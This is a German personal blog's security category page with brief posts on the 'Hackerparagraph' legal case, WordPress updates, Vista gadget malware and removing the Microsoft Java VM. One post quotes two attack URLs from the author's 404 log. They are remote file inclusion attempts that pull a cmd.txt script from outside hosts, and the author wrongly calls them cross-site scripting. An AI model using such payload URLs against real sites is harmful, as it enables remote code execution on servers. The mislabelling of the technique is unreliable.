kumbula.net » Sicherheit

Dann war es wohl doch nicht strafbar…

ossi — Thu, 14 Aug 2008 13:21:11 +0000

Wie hier bereits schon mal erwähnt, gab es ja diese Geschichte mit dem Hackerparagraphen und dem Tool-Upload. Der Vollständigkeit halber möchte ich hier festhalten, dass die Geschichte zu Ende ist, weil das Verfahren eingestellt wurde (ohne dabei Grundlegendes zu klären).
Nachzulesen hier im spitblog.
Fiel mir heute wieder ein und sah dazu mal nach.

WordPress 2.3 und Datenschutz

ossi — Tue, 25 Sep 2007 16:14:39 +0000

Da freu ich mich (nicht wirklich) über ein neuerlich fälliges Update meiner 20 Blogs und der Nachricht, dass es einen Auto-Updater gibt der das ganze in Zukunft erleichtern soll. Da sieht es so aus, als ob das eine miese Schnüffelnummer ist oder zumindest potentielles Unheil birgt. Update verschoben bis ich mehr Zeit dazu hab.
Der Nachtwächter weiß in seinem Blog mehr dazu.

The InstantUpgrade plugin

ossi — Thu, 13 Sep 2007 14:22:25 +0000

Nur ‘ne schnelle Notiz: ein Instantupgrade-Plugin welches WordPress auf Knopfdruck upgraded. Mal mit mehr Zeit ansehen….später.

zirona.com – The InstantUpgrade plugin

“Hackertools”: “Dann werden wir ja definitiv sehen, ob’s strafbar ist oder nicht.” Update

ossi — Thu, 13 Sep 2007 13:19:07 +0000

“BRAVO!” kann ich da sagen und schmeiss mich weg.

Da hosted jemand einfach ein paar Tools und zeigt sich selber an um zu sehen inwieweit der “Hackerparagraph” einschlägt oder nicht.

Die ganze Geschichte:

Originalpost auf spitblog.de
gulli.com

Viel Erfolg dabei!
Ich bin gespannt wie es weiter geht.

Update:
Mehr dazu und das Fax: auch auf spitblog.de

Die neue Malware-Generation

ossi — Thu, 13 Sep 2007 10:28:22 +0000

Next generation malware: Windows Vista’s gadget API

Wie Tim Brown auf der Sicherheitsmailingliste Full Disclosure schreibt, sind die neue Generation der Windows-Schädlinge HTML-basierte Widgets.
Dass Windows HTML-Elemente auf Taskbar und Dekstop einbinden kann ist seit NT 4.0 nichts neues, allerdings lief dieser innerhalb einer Art Sandbox im Betriebsystem und konnte hier keinen Schaden anrichten.
Aber seit der neuen Windows Vista API ist es nun möglich und zweifelsohne wird es nicht lange dauern bis das auch die Cracker und bösen Buben entdecken.
Tim verweist auf ein Whitepaper von portcullis-security.com:

Next generation malware: Windows Vista’s gadget API Windows has had the ability to embed HTML into it’s user interface for many years. Right back to and including Windows NT 4.0, it has been possible to embed HTML into the task bar, but the OS has always maintained a sandbox, from which the HTML has been unable to escape. All this changes with Windows Vista.

WordPress 2.2.3 Update

ossi — Thu, 13 Sep 2007 09:07:05 +0000

Und wieder eine neue WordPress-Version. Jedes Update ist für mich immer ein kleiner Update-Marathon mit ca. 20 Blogs die auf den aktuellen Stand gebracht werden wollen. *Ächz*
Aber Sicherheit geht vor, also fleißig geupdated.

[Update]

Da hing heise.de aber kräftig hinterher: bis heute hat es gedauert (5 Tage), bis deren Meldung dazu kam. Was war nur los? LAG?

Passwortklau für Dummies

ossi — Tue, 11 Sep 2007 22:52:47 +0000

… oder warum Cross Site Scripting wirklich ein Problem ist.

Ein toller Artikel auf heise.de über Cross-Site-Scripting und böses Javascript.
Lesen und schlauer sein!

Ach du dickes Ei – Websaftsack am Start – Update

ossi — Wed, 18 Jul 2007 05:00:21 +0000

Ei ei ei, was haben wir denn hier im 404-Log:

http://kumbula.net/category/include/main.php?config
[search_disp]=true&include_dir=http://br.geocities.com/edmidg/cmd.txt?

War wieder der High-Level-Scripting-L33t-Haxx0r-Bot am Start?

Leck mich!

Update:
Da hat sich wohl jemand ‘ne neue Domain besorgt nachdem die bei Geocities gesperrt wurde. *flöt*

404: http://kumbula.net/include/main.php?config
[search_disp]=true&include_dir=http://edl.yoll.net/cmd.txt?

Der Clou an der Sache ist, dass das ein Cross-Site-Scripting-Angriff auf osTicket ist, ein ganz nettes Ticketsystem, was aber schon lange nicht mehr hier läuft. Gut für mich, doof für den schlimmen Finger.

Nahezu kostenlose Firewall von Ashampoo

ossi — Thu, 24 Aug 2006 12:31:18 +0000

Es gibt eine personal Firewall für privaten wie gewerblichen Einsatz lediglich für eine Email-Adresse. Auf heise.de kann man mehr lesen:
http://www.heise.de/newsticker/meldung/77209

Mircrosoft Java Virtual Machine deinstallieren

ossi — Sun, 06 Aug 2006 21:01:07 +0000

Die M$-VM ist eine bekannte Sicherheitslücke im System… …daher ist das einer der ersten Schritte wenn ich ein System neu aufsetzte. Hier die Kurzanleitung.

start > ausführen

eingabe :
RunDLL32 advpack.dll, launchINFSection javaINFUnInstall

mit Ja bestätigen un Neustarten

in der registry

hkey_local_machine/software/microsoft/javaVM und
hkey_local_machine/software/microsoft/internet explorer/addvancedoption/java_vm löschen

löschen von :

%systemroot%\java ordner
java.pnf im Ordner %systemroot%\inf
jview.exe und wjview.exe in %systemroot%\system32

Neustart

sun java installieren

http://www.java.com/de/